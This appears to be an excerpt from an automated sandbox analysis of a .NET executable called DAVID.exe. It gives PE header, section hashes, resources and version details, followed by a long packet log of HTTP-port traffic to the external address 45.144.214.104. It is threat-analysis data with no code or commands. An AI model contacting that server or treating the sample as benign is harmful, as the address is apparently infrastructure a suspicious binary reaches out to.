IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2b9d4	0x2ba00	6e58bb9487215d1e68ff205236f8162a	False	0.47767057664756446	data	6.078119607159537	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0x600	0x600	b71e336159f2cdd2b5cc567b0d00f1c2	False	0.4140625	data	4.039102225311513	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x30000	0xc	0x200	523eaea8c2cc44db65568553f321bf3e	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2e0a0	0x2fc	data			0.43717277486910994
RT_MANIFEST	0x2e39c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	DAVID
FileVersion	1.0.0.0
InternalName	DAVID.exe
LegalCopyright	Copyright 2022
LegalTrademarks
OriginalFilename	DAVID.exe
ProductName	DAVID
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 4, 2025 09:35:20.783116102 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:20.788167000 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:20.788237095 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:20.789366961 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:20.794390917 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509648085 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509685040 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509701014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509732008 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.509783983 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509799957 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509813070 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509840012 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.509860992 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.509897947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509917021 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509931087 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509948015 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.509957075 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.509983063 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.514883995 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.514898062 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.514940023 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.631813049 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.631841898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.631856918 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.631877899 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.631886005 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.631918907 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.632148027 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.632160902 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.632177114 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.632201910 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.632215977 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.632229090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.632257938 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.632980108 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633018017 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633022070 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.633029938 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633064032 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.633573055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633585930 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633610010 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633625031 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633631945 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.633639097 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.633660078 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.634419918 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.634433031 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.634445906 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.634459972 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.634469986 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.634490013 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.676528931 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.762564898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762603998 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762617111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762645960 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762649059 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.762659073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762701988 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.762831926 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762852907 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762866020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762876987 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.762907982 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.762968063 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.762979984 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763014078 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.763087034 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763098955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763158083 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.763722897 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763745070 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763756990 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763784885 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.763865948 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763878107 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763890028 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.763905048 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.763928890 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.763974905 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764666080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764687061 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764700890 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764712095 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.764749050 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.764791012 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764801979 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764842987 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.764954090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.764966965 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.765010118 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.765609980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.765659094 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.765671015 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:21.765700102 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:21.816569090 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.024116993 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024135113 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024147034 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024158001 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024174929 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024184942 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024236917 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.024310112 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.024593115 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024888039 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024899960 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024919987 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024931908 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024940014 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.024941921 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024956942 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024960041 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.024969101 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024982929 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.024990082 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.024996996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025005102 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025015116 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.025017023 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025029898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025034904 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.025043011 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025055885 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.025094032 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.025686979 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025693893 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025707006 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025748968 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025749922 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.025762081 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025769949 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025778055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025856018 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025867939 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.025871992 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.025949955 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.026501894 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.026515007 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.026525974 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.026555061 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.026570082 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.026932955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.026946068 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.026957989 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027081013 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027173042 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.027194977 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027216911 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027265072 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.027390957 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027403116 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027415037 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.027450085 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028059959 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028072119 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028084040 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028095961 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028110981 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028122902 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028122902 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028137922 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028181076 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028740883 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028760910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028774023 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028785944 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028790951 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028800011 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028812885 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028825045 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028830051 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028839111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028851986 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.028862953 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028877020 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.028901100 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.029717922 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.029732943 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.029747009 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.029761076 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.029774904 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.029784918 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.029798031 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.082436085 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.112174034 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112195969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112349987 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.112423897 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112437963 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112498045 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.112899065 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112911940 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112922907 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112932920 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112953901 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.112963915 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.112976074 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.112991095 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113003969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113019943 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113030910 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113039017 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113053083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113063097 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113080978 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113097906 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113142014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113154888 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113168955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113178968 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113202095 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113594055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113606930 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113620043 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113632917 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113646030 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113660097 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113667011 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113706112 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.113727093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113739014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113751888 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.113771915 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.114233971 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114250898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114269972 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114288092 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.114295006 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114308119 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114319086 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114327908 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.114343882 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.114351034 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.114396095 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.155179977 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155196905 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155209064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155220985 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155236959 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155249119 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155277967 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.155328035 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.155414104 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155425072 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155437946 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155472994 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.155495882 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155507088 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155534983 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.155942917 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.155985117 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156054974 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156066895 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156114101 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156142950 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156152964 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156178951 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156188965 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156198978 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156214952 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156224966 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156248093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156261921 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156292915 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156344891 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156357050 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156368017 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156393051 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156410933 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156464100 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156476974 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156488895 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156529903 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156558037 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156600952 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156615019 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156642914 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156661034 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156678915 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156810045 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156831026 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156842947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156852961 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156879902 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.156922102 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156941891 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156959057 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.156984091 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.157041073 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157053947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157083035 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.157171965 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157221079 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.157236099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157247066 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157294035 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.157309055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157320976 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157362938 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.157511950 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157524109 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.157558918 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.285610914 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.285650969 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.285680056 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.285697937 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.285712957 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.285731077 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.285756111 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.285773993 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.285783052 CET	49709	80	192.168.2.6	45.144.214.104
